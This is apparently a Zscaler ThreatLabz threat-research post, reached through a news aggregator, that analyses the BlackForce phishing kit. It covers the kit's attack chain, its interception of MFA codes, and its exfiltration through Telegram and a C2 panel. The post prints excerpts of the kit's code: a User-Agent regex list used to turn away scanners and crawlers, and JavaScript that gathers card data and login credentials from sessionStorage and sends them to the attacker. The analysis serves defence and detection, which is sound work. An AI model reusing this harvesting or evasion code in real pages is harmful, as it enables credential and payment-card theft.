惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
GRAHAM CLULEY
T
Tenable Blog
Know Your Adversary
Know Your Adversary
C
CXSECURITY Database RSS Feed - CXSecurity.com
P
Privacy International News Feed
S
Security Affairs
NISL@THU
NISL@THU
O
OpenAI News
Attack and Defense Labs
Attack and Defense Labs
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Hacker News: Ask HN
Hacker News: Ask HN
Webroot Blog
Webroot Blog
Schneier on Security
Schneier on Security
S
SegmentFault 最新的问题
S
Schneier on Security
G
Google Developers Blog
V
V2EX
C
Check Point Blog
U
Unit 42
Google DeepMind News
Google DeepMind News
T
Threatpost
阮一峰的网络日志
阮一峰的网络日志
T
The Exploit Database - CXSecurity.com
Recent Announcements
Recent Announcements
M
MIT News - Artificial intelligence
S
Secure Thoughts
博客园 - 司徒正美
Recorded Future
Recorded Future
P
Proofpoint News Feed
Spread Privacy
Spread Privacy
K
Kaspersky official blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
AI
AI
博客园 - 聂微东
N
News and Events Feed by Topic
SecWiki News
SecWiki News
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
V
Vulnerabilities – Threatpost
P
Palo Alto Networks Blog
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Engineering at Meta
Engineering at Meta
Recent Commits to openclaw:main
Recent Commits to openclaw:main
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
酷 壳 – CoolShell
酷 壳 – CoolShell
WordPress大学
WordPress大学
The Hacker News
The Hacker News
The Last Watchdog
The Last Watchdog
Project Zero
Project Zero
W
WeLiveSecurity
博客园 - Franky

Security Research | Blog

ClaudeFix: Shared Claude Chats Meet ClickFix | Zscaler Why Do F1 Teams Need Cybersecurity, and What Is AI’s Role? Indirect Prompt Injection Targets AI Agents | ThreatLabz Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz Edgecution: Malicious Edge Extension Backdoor | ThreatLabz SmartApeSG Supply Chain Attack Targets Okendo | ThreatLabz AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz What the ThreatLabz 2026 Phishing and Initial Access Report Means for the Public Sector | Zscaler Shai-Hulud: Miasma, Hades, & AI Scanner Evasion | ThreatLabz Zscaler ThreatLabz 2026 Phishing and Initial Access Report Technical Analysis of MLTBackdoor | ThreatLabz When the Scanner Starts Thinking: Learnings from Mythos & GPT 5.5 Cyber in Security Testing | Zscaler OpenClaw Skill Distributes Remcos & GhostLoader | ThreatLabz Tropic Trooper: AdaptixC2 + Custom Beacon | ThreatLabz Do not delete blog (testing) | Zscaler Payouts King Takes Aim at the Ransomware Throne | ThreatLabz The Alibaba Incident and Why Zero Trust Matters More Than Ever In-Memory Loader Drops ScreenConnect | ThreatLabz Supply Chain Attacks Surge in March 2026 | ThreatLabz Claude Code Leak: Critical AI Security Threat 2026 Latest Xloader Obfuscation Code & C2 Protocol | ThreatLabz CVE-2026-20131: Analysis of FMC RCE | ThreatLabz Technical Analysis of SnappyClient | ThreatLabz China-nexus Group Targets Arabian Gulf Region | ThreatLabz Middle East Conflict Fuels Cyber Attacks | ThreatLabz Dust Specter APT Targets Gov’t Officials in Iraq | ThreatLabz APT37 Adds New Tools For Air-Gapped Networks | ThreatLabz GuLoader Malware Obfuscation Techniques Analyzed GuLoader Obfuscation Analysis | ThreatLabz Technical Analysis of Marco Stealer | ThreatLabz Latest Public Sector AI Adoption Trends: What Government, Healthcare, and Education Security Teams Need to Know | Zscaler Operation Neusploit: APT28 Uses CVE-2026-21509 | ThreatLabz 7 Predictions for 2026 | Zscaler SHEETCREEP, FIREPOWER, and MAILCREEP Analysis | ThreatLabz AI is Now Default Enterprise Accelerator: Takeaways from ThreatLabz 2026 AI Security Report | Zscaler GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz Malicious NPM Packages Deliver NodeCordRAT | ThreatLabz What’s Powering Enterprise AI in 2025: ThreatLabz Report Sneak Peek | Zscaler BlindEagle Deploys Caminho and DCRAT | ThreatLabz React2Shell RCE Vulnerability (CVE-2025-55182) | ThreatLabz Shai-Hulud V2 Poses Risk to NPM Supply Chain | ThreatLabz Technical Analysis of Matanbuchus 3.0 | ThreatLabz In-Depth Analysis: Water Gamayun APT Multi-Stage Attack Uncovered CVE-2025-50165: Windows Graphics Component Flaw | ThreatLabz Mobile, IoT, and OT Risks Converge in the Public Sector | Zscaler Industry Attacks Surge, Mobile Malware Spreads: The ThreatLabz 2025 Mobile, IoT & OT Report | Zscaler Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058) | Zscaler F5 Security Incident Advisory | Zscaler Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface | Zscaler SEO Poisoning Targets Ivanti VPN: Credential Theft Alert Cisco Firewall and VPN Zero Day Attacks | ThreatLabz COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz YiBackdoor: Linked to IcedID and Latrodectus | ThreatLabz Technical Analysis of Zloader Updates | ThreatLabz Mitigating Risks from the Shai-Hulud NPM Worm | ThreatLabz Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz Technical Analysis of SmokeLoader Version 2025 | ThreatLabz Technical Analysis of kkRAT | ThreatLabz APT37: Rust Backdoor & Python Loader | ThreatLabz Anatsa’s Latest Updates | ThreatLabz Termncolor and Colorinal Explained | ThreatLabz GenAI Used to Impersonate Brazil’s Govt Websites | ThreatLabz Tracking Updates to Raspberry Robin | ThreatLabz Ransomware Surges, Extortion Escalates: ThreatLabz 2025 Ransomware Report | Zscaler China-nexus APT Targets the Tibetan Community | ThreatLabz CVE-2025-53770 | ThreatLabz Black Hat SEO Poisoning Search Engine Results For AI | ThreatLabz
Technical Analysis of the BlackForce Phishing Kit | ThreatLabz
Gladis Brinda R, Ashwathi Sasi · 2025-12-12 · via Security Research | Blog

The following sections provide insight into each stage of BlackForce’s attack chain.

Discovery and code analysis

ThreatLabz began its analysis of BlackForce when we identified a distinct pattern while hunting for phishing campaigns. The suspicious domains consistently used JavaScript files with cache-busting hashes in their names. This led ThreatLabz to the phishing kit's entry point, a single line in the page's HTML source that loads the entire platform.

Cache-busting is a technique where a hash is generated based on the file's contents thus forcing the victim's browser to download the latest version of the malicious script instead of using a cached version. The code example below illustrates the DOM structure of the malicious webpage, featuring a filename format (index-[hash].js) that is commonly associated with professional build tools.

BlackForce code snippet

The most effective deception tactic used by the BlackForce phishing kit is its "legitimate-looking" codebase. Our analysis found that more than 99% of the malicious JavaScript file's content consists of production builds of React and React Router, giving it a legitimate appearance.

Attack chain

The BlackForce attack chain features a vetting system to qualify targets, after which a live operator takes over to orchestrate a guided compromise. The attack chain for this campaign is shown in the figure below.

Attack chain diagram depicting the BlackForce attack flow.

Figure 1: Attack chain diagram depicting the BlackForce attack flow.

The sequence of events for a BlackForce phishing campaign are as follows:

1. The victim clicks on the phishing link and is directed to an attacker-controlled phishing page.

2. A server-side Internet Service Provider (ISP)/vendor blocklist is applied to the victim's IP or User-Agent, blocking any traffic identified as a crawler or scanner.

3. After user validation, the phishing page is served and is designed to appear as a legitimate website, as seen in the figure below.

Shows the legitimate-looking phishing page(s) displayed to the victim.

Figure 2: Shows the legitimate-looking phishing page(s) displayed to the victim.

4. The victim, believing the page is authentic, enters their credentials, which are immediately captured by the attacker.

5. The attacker receives real-time victim session alerts and the exfiltrated credentials to their command-and-control (C2) panel alerting them of a live target. The stolen credentials are also sent to the attacker via a Telegram channel, as shown in the figure below.

The attacker’s view of the exfiltrated data being sent to Telegram.

Figure 3: The attacker’s view of the exfiltrated data being sent to Telegram.

6. The attacker attempts to log into the legitimate target website using the stolen credentials, triggering an MFA authentication prompt.

7. Using MitB attack techniques, the attacker deploys a fake MFA authentication page to the victim’s browser through the C2 panel, as shown in the figure below.

BlackForce control panel for version 3.

Figure 4: BlackForce control panel for version 3.

8. The victim's browser renders the fake MFA page, and the victim, unaware of the attack, enters their MFA code, as shown in the figure below.

Example BlackForce phishing page that hijacks an SMS code sent to the victim.

Figure 5: Example BlackForce phishing page that hijacks an SMS code sent to the victim.

9. The attacker captures the MFA code and submits it to the legitimate website, successfully bypassing the MFA process and compromising the victim’s account.

ANALYST NOTE: It is important to note that not all BlackForce phishing campaigns display pages to steal MFA codes, since not all websites use MFA. If the website utilizes MFA, the BlackForce phishing kit’s control panel provides attackers with custom options (based on the target brand) to steal codes that are provided via SMS, card, or app-based authentication.

Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack.

Exfiltration channel

The networking module is the most important part of the BlackForce phishing kit. The attackers use Axios, a popular HTTP client, to manage all communication. Axios instances control the data flow in the kit. Version 3 of BlackForce includes two client-side Axios instances: one for C2 communication and another for exfiltrating data to a hardcoded Telegram channel. In versions 4 and 5 of BlackForce, only the primary C2 instance remains, and the Telegram configuration has been moved to the server-side. The figure below shows the BlackForce control panel used to set up the exfiltration channel for version 5.

BlackForce version 5 configuration for exfiltration settings.

Figure 6: BlackForce version 5 configuration for exfiltration settings. 

Anti-analysis filters

The BlackForce phishing kit employs anti-analysis techniques to evade detection and prolong its operational lifespan. The first line of defense is a proactive client-side filter, which attempts to identify non-human visitors the moment they land on the page. This is accomplished with a database of signatures and a parsing engine that processes the visitor's User-Agent string. The code compares the User-Agent against a set of predefined regular expressions to detect web crawlers, security scanners, and SEO tools, as shown in the example below.

{
    regex: "Nmap Scripting Engine",
    name: "Nmap",
    category: "Security Checker",
    url: "https://nmap.org/book/nse.html",
    producer: {
        name: "Nmap",
        url: "https://nmap.org/"
    }
},
{
    regex: "Netcraft( Web Server Survey| SSL Server Survey|SurveyAgent)",
    name: "Netcraft Survey Bot",
    category: "Search bot",
    url: "",
    producer: {
        name: "Netcraft",
        url: "http://www.netcraft.com"
    }
},
{
    regex: "MSNBot|msrbot|bingbot|BingPreview|msnbot-(UDiscovery|NewsBlogs)|adidxbot",
    name: "BingBot",
    category: "Search bot",
    url: "http://search.msn.com/msnbot.htmn",
    producer: {
        name: "Microsoft Corporation",
        url: "http://www.microsoft.com"
    }
},


In versions 4 and 5, the BlackForce C2 server proactively filters all incoming traffic. Version 4 enforces a mobile-only policy that rejects all desktop user agents and cross-references the remaining visitors' user agents, resolved hostnames, and ISPs against a comprehensive blocklist of keywords. Any signature associated with a security scanner or automated crawler results in an immediate redirect to a generic error page. The ISP blocklist for BlackForce version 4 is available in the ThreatLabz GitHub repository.

BlackForce also enforces a list of permitted countries and performs User-Agent profiling to immediately block any identified scanners and crawlers, as shown in the figure below.

Anti-analysis mechanisms implemented in version 5 of BlackForce.

Figure 7: Anti-analysis mechanisms implemented in version 5 of BlackForce.

Statefulness

A critical architectural difference separating BlackForce version 3 from its successors is the evolution from a stateless to a stateful attack model. In version 3, the attack was fundamentally fragile as exfiltrated credentials existed only in the browser's active memory. This meant a page refresh or network error could erase the stolen data and break the attack flow. To address this weakness, the author of BlackForce versions 4 and 5 leveraged the browser's sessionStorage to create a persistent, stateful session. This allows BlackForce to "remember" credentials across the entire multi-stage attack. The example below, taken from version 4, demonstrates how data is exfiltrated using the sendMessage function by retrieving it from sessionStorage.

try {
            o(!0);
            const m = y.ccn.replace(/\s/g, "");
            sessionStorage.setItem("cc", m);
            const x = {
                    ccn: y.ccn,
                    exp: y.exp,
                    cvv: y.cvv,
                    user: sessionStorage.getItem("user"),
                    pass: sessionStorage.getItem("pass"),
                    name: sessionStorage.getItem("name"),
                    dob: sessionStorage.getItem("dob"),
                    city: sessionStorage.getItem("city"),
                    phone: sessionStorage.getItem("phone"),
                    address: sessionStorage.getItem("address"),
                    zip: sessionStorage.getItem("zip")
                },
                C = await pt.sendMessage(x, e, "card"),
                P = (await pt.getConfig()).data.panel;
            C.data.status === "success" ? (o(!1), n(null), t(P === !0 ? "loader" : "confirm")) : (n(null), o(!1))
        }


C2 communication

The BlackForce C2 panel controls every action from the moment a victim lands on the page until their data is stolen. The panel provides a set of asynchronous functions that can be categorized into four distinct roles:

  • Functions that identify the visitor, enrich stolen data, and protect the phishing kit from detection.
  • Functions responsible for stealing victim data and sending it to the attacker.
  • Functions that manage the real-time, interactive flow of the phishing session.
  • Administrative functions used by an attacker to manage the attack.

The BlackForce C2 panel for version 5 is shown in the figure below.

BlackForce C2 panel for version 5.

Figure 8: BlackForce C2 panel for version 5.